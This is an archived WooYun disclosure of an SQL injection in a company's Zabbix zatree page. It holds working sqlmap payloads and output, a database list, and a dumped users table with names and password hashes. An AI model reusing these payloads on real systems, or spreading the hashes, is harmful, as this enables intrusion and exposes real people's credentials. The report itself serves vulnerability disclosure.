乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-09-16: 细节已通知厂商并且等待厂商处理中 2015-09-16: 厂商已经确认,细节仅向厂商公开 2015-09-26: 细节向核心白帽子及相关领域专家公开 2015-10-06: 细节向普通白帽子公开 2015-10-16: 细节向实习白帽子公开 2015-10-31: 细节向公众公开
RT
1、注入点
http://zabbix.emar.com/zabbix/zatree/graph.php?hostid=10716
参数hostid存在布尔型注入2、数据
Place: GETParameter: hostid Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: hostid=10716 AND 2488=2488 Type: UNION query Title: MySQL UNION query (NULL) - 2 columns Payload: hostid=10716 UNION ALL SELECT CONCAT(0x3a796f783a,0x70464572455965497562,0x3a66666a3a), NULL# Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: hostid=10716 AND SLEEP(5)---[11:43:10] [INFO] the back-end DBMS is MySQLweb application technology: PHP 5.3.27back-end DBMS: MySQL 5.0.11[11:43:10] [INFO] fetching current usercurrent user: '[email protected].%'
数据库
available databases [8]:[*] ansible[*] asset[*] auto_discovery[*] cmdb[*] confluence[*] dba[*] dbaadmin[*] information_schema
数据库用户密码:
Table: users[3 entries]+----------+----+-----------------------------------------------+-------------+| group_id | id | password | username |+----------+----+-----------------------------------------------+-------------+| 1 | 1 | *E6CC90B878B948C35E92B003C792C46C58C4AF40 (1) | liujun || 1 | 2 | *39A731B7F27A0DB023ADDA30DEF09D4616805ED6 | majinyou || 1 | 3 | *CF76740C52A1EEE8DA872F5252441EAA70D8D12D | changnannan |+----------+----+-----------------------------------------------+-------------+
数据库我就不连接了 涉及数据
危害等级:高
漏洞Rank:20
确认时间:2015-09-16 13:24
多谢路人甲,我们紧急修复。
暂无